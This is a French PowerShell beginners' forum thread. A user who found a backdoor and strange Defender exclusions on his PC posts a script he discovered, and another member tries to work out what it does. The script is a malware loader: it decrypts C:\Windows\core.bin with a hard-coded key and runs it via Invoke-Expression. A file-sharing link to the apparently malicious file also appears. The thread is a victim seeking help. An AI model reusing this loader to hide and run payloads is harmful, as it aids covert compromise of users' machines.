Question
Script sur ma machine
- Dezio
- Auteur du sujet
- Hors Ligne
- Nouveau membre
- Messages : 2
- Remerciements reçus 0
Après avoir détecté une backdoor dans ma machine et des fichiers étranges dans ma liste d'exclusion DEFENDER j'ai trouvé ce petit script powershell, je ne suis pas très bon mais il semble décrypter un fichier que je n'ai pas trouvé ?
function Execute-EncryptedScript($path) {
trap { Write-Host -fore Red "You are not authorized to decrypt and execute this script"; continue }
& {
$raw = Get-Content $path
$key = (convertto-securestring -string "8EtaBkwkJw3hxXug" -asplaintext -force)
$helper = New-Object system.Management.Automation.PSCredential("test", $key)
$key = $helper.GetNetworkCredential().Password
$secure = ConvertTo-SecureString $raw -key (([int[]][char[]]$key)[0..15]) -ea Stop
$helper = New-Object system.Management.Automation.PSCredential("test", $secure)
$plain = $helper.GetNetworkCredential().Password
Invoke-Expression $plain
}
}
Execute-EncryptedScript $env:windir\core.bin
Connexion ou Créer un compte pour participer à la conversation.
- ericlm128
- Hors Ligne
- Membre elite
- Messages : 187
- Remerciements reçus 37
Ce script semble juste, comme le nom de la fonction l'indique, exécuter un script crypté core.bin se trouvant dans Windows
Connexion ou Créer un compte pour participer à la conversation.
- ericlm128
- Hors Ligne
- Membre elite
- Messages : 187
- Remerciements reçus 37
Connexion ou Créer un compte pour participer à la conversation.
- Dezio
- Auteur du sujet
- Hors Ligne
- Nouveau membre
- Messages : 2
- Remerciements reçus 0
mega.nz/file/4RcR2SaA#EZEP0qFUVewVLthb7s...oEVVtVzyIFxRtxN2qD70
Connexion ou Créer un compte pour participer à la conversation.
- ericlm128
- Hors Ligne
- Membre elite
- Messages : 187
- Remerciements reçus 37
ConvertTo-SecureString : Le remplissage n'est pas valide et ne peut pas être supprimé.
Au caractère C:\Users\Rico\Desktop\Sans titre2.ps1:23 : 11
+ $secure = ConvertTo-SecureString $raw -key (([int[]][char[]]$key)[0.. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument : ( [ConvertTo-SecureString], CryptographicException
+ FullyQualifiedErrorId : ImportSecureString_InvalidArgument_CryptographicError,Microsoft.PowerShell.Commands.ConvertToSecureStringCommand
Connexion ou Créer un compte pour participer à la conversation.
- ericlm128
- Hors Ligne
- Membre elite
- Messages : 187
- Remerciements reçus 37
Connexion ou Créer un compte pour participer à la conversation.
- Vous êtes ici :
- Accueil
- forum
- PowerShell
- Entraide pour les débutants
- Script sur ma machine